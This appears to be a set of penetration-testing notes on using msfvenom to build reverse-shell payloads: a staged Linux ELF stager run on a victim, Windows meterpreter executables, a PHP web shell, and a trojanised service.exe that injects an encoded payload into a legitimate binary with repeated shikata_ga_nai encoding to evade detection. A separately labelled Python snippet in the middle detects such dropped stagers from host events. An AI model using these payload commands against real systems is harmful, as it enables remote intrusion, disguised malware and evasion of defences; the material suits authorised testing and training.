To search for payloads:
$ msfvenom --list payloads | grep x64 | grep linux | grep reverse
linux/x64/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker
linux/x64/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
linux/x64/pingback_reverse_tcp Connect back to attacker and report UUID (Linux x64)
linux/x64/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_reverse_ipv6_tcp Connect back to attacker and spawn a command shell over IPv6
linux/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
Pick the staged shell payload linux/x64/shell/reverse_tcp:
$ msfvenom -p linux/x64/shell/reverse_tcp lhost=127.0.0.1 lport=5353 -f elf -o reverse5353
Pass this payload to the target machine.
Next, make the payload executable:
$ chmod +x reverse5353
$ ./reverse5353
On Kali, set up a listener with the same payload.
Finally, run the stager on the victim's machine.
$ ./reverse5353
It should start downloading the rest of the payload from Kali, which starts a reverse shell on Kali.
(Optional) Upgrade to a meterpreter with the /post/multi/manage/shell_to_meterpreter module.
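Seen from the target host, the steps above leave a recognisable sequence: a file is written, marked executable, run, and then connects back to the listener. The following is an added example (not part of the original notes) that correlates that sequence over constructed host events; the event tuple format, host names and the 300-second window are assumptions for illustration.

```python
# Added example: flag binaries that are written, chmod +x'd, executed and then
# connect out, with each step close in time to the previous one.

# Constructed sample events (not output of a real tool):
# (timestamp_seconds, host, event, path, detail)
EVENTS = [
    (100, "web01", "file_write", "/tmp/reverse5353", ""),
    (104, "web01", "chmod_exec", "/tmp/reverse5353", ""),
    (110, "web01", "exec", "/tmp/reverse5353", ""),
    (111, "web01", "connect", "/tmp/reverse5353", "127.0.0.1:5353"),
    (200, "web01", "exec", "/usr/bin/curl", ""),          # installed binary, no drop
    (201, "web01", "connect", "/usr/bin/curl", "203.0.113.7:443"),
    (300, "db01", "file_write", "/home/app/tool", ""),
    (305, "db01", "chmod_exec", "/home/app/tool", ""),
    (9000, "db01", "exec", "/home/app/tool", ""),         # too late to correlate
]

CHAIN = ["file_write", "chmod_exec", "exec", "connect"]
WINDOW = 300  # assumed maximum gap in seconds between consecutive steps


def find_dropped_stagers(events, window=WINDOW):
    """Return (host, path, destination) for every complete chain found."""
    state = {}  # (host, path) -> (index of next expected step, time of last step)
    hits = []
    for ts, host, event, path, detail in sorted(events):
        key = (host, path)
        if event == CHAIN[0]:
            state[key] = (1, ts)          # a fresh write restarts the chain
            continue
        step, last = state.get(key, (0, None))
        if step == 0 or event != CHAIN[step]:
            continue                      # not tracking this file, or out of order
        if ts - last > window:
            state.pop(key, None)          # stale: stop tracking
            continue
        if step == len(CHAIN) - 1:
            hits.append((host, path, detail))
            state.pop(key, None)
        else:
            state[key] = (step + 1, ts)
    return hits


if __name__ == "__main__":
    for host, path, dest in find_dropped_stagers(EVENTS):
        print(f"{host}: {path} was dropped, run, and connected to {dest}")
```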
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.23.10 LPORT=4444 -a x86 -f exe > output.exe
$ msfvenom -p php/meterpreter_reverse_tcp lhost=<my-ip> lport=<port> -o shell.php
Set up a listener with the same payload using exploit/multi/handler.
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=5353 -f exe -e x86/shikata_ga_nai -i 15 -k -x service_bak.exe > service.exe
-x : Specify what executable file (to use as a template) to inject the payload into
-k : Preserve the template behavior and inject the payload as a new thread
-e x86/shikata_ga_nai -i 15 : Encode the payload 15 times using shikata_ga_nai
To check encoding options:
$ msfvenom -l encoders